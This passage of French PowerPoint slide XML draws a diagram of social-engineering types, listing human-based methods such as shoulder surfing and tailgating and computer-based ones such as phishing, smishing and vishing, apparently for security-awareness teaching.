              <a:gd name="connsiteY3" fmla="*/ 0 h 1362500"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="1362500">
                <a:moveTo>
                  <a:pt x="0" y="1362500"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="1362500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="0"/>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97293" tIns="646670" rIns="97294" bIns="646671" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Forme libre 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8256966" y="3446736"/>
            <a:ext cx="238346" cy="1476042"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1476042"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1476042"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 1476042 h 1476042"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 1476042 h 1476042"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="1476042">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="1476042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="1476042"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent5">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4">
              <a:tint val="90000"/>
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="94494" tIns="700642" rIns="94494" bIns="700642" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Forme libre 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9687047" y="1970693"/>
            <a:ext cx="238345" cy="726667"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1135417"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1135417"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 1135417 h 1135417"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 1135417 h 1135417"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="1135417">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="1135417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="1135417"/>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102869" tIns="538705" rIns="102869" bIns="538704" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Forme libre 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9687047" y="1970693"/>
            <a:ext cx="238345" cy="283109"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 681250"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 681250"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 681250 h 681250"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 681250 h 681250"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="681250">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="681250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="681250"/>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113830" tIns="322582" rIns="113829" bIns="322581" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Forme libre 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9687047" y="1743610"/>
            <a:ext cx="238346" cy="227083"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 227083 h 227083"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 227083 h 227083"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 227083"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 227083"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="227083">
                <a:moveTo>
                  <a:pt x="0" y="227083"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="227083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="0"/>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123643" tIns="105312" rIns="123643" bIns="105311" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Forme libre 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9687047" y="1289443"/>
            <a:ext cx="238346" cy="681250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 681250 h 681250"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 681250 h 681250"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 681250"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 681250"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="681250">
                <a:moveTo>
                  <a:pt x="0" y="681250"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="681250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="0"/>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113830" tIns="322582" rIns="113829" bIns="322581" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Forme libre 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9687047" y="835276"/>
            <a:ext cx="238346" cy="1135417"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 1135417 h 1135417"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 1135417 h 1135417"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1135417"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1135417"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="1135417">
                <a:moveTo>
                  <a:pt x="0" y="1135417"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="1135417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent6">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102869" tIns="538705" rIns="102869" bIns="538704" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Forme libre 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8256966" y="1970693"/>
            <a:ext cx="238346" cy="1476042"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 1476042 h 1476042"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 1476042 h 1476042"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1476042"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1476042"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="1476042">
                <a:moveTo>
                  <a:pt x="0" y="1476042"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="1476042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent5">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4">
              <a:tint val="90000"/>
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1">
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="94494" tIns="700643" rIns="94494" bIns="700641" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Forme libre 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7119159" y="3265069"/>
            <a:ext cx="1912281" cy="363333"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1912281"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 363333"/>
              <a:gd name="connsiteX1" fmla="*/ 1912281 w 1912281"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 363333"/>
              <a:gd name="connsiteX2" fmla="*/ 1912281 w 1912281"/>
              <a:gd name="connsiteY2" fmla="*/ 363333 h 363333"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1912281"/>
              <a:gd name="connsiteY3" fmla="*/ 363333 h 363333"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1912281"/>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281" h="363333">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1912281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1912281" y="363333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="363333"/>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8889" tIns="8890" rIns="8891" bIns="8890" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="622300">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" kern="1200" dirty="0" smtClean="0"/>
              <a:t>Types d’ingénierie sociale</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Forme libre 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8495313" y="1789027"/>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smtClean="0"/>
              <a:t>Basée sur l’humain</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Forme libre 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925394" y="653610"/>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err="1" smtClean="0"/>
              <a:t>Eavesdropping</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Forme libre 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925394" y="1107776"/>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err="1" smtClean="0"/>
              <a:t>Shoulder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" kern="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" kern="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>surffing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Forme libre 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925394" y="1561943"/>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err="1" smtClean="0"/>
              <a:t>Dumbster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" kern="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" kern="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>diving</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Forme libre 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925393" y="2072136"/>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err="1" smtClean="0"/>
              <a:t>Piggybacking</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Forme libre 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925393" y="2526303"/>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err="1" smtClean="0"/>
              <a:t>Tailgatting</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Forme libre 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8495313" y="4741111"/>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smtClean="0"/>
              <a:t>Basé sur ordinateur</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Forme libre 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925394" y="3378611"/>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smtClean="0"/>
              <a:t>Phishing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Forme libre 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925394" y="3832778"/>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smtClean="0"/>
              <a:t>Spear phishing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Forme libre 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925394" y="4286944"/>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err="1" smtClean="0"/>
              <a:t>Smishing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Forme libre 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925394" y="4741111"/>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err="1" smtClean="0"/>
              <a:t>Vishing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Forme libre 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925394" y="5195278"/>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err="1" smtClean="0"/>
              <a:t>Hoax</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Forme libre 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925394" y="5649445"/>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err="1" smtClean="0"/>
              <a:t>Popup</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Forme libre 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9925394" y="6103612"/>
            <a:ext cx="1191733" cy="363333"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1191733"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 363333"/>
              <a:gd name="connsiteX1" fmla="*/ 1191733 w 1191733"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 363333"/>
              <a:gd name="connsiteX2" fmla="*/ 1191733 w 1191733"/>
              <a:gd name="connsiteY2" fmla="*/ 363333 h 363333"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1191733"/>
              <a:gd name="connsiteY3" fmla="*/ 363333 h 363333"/>
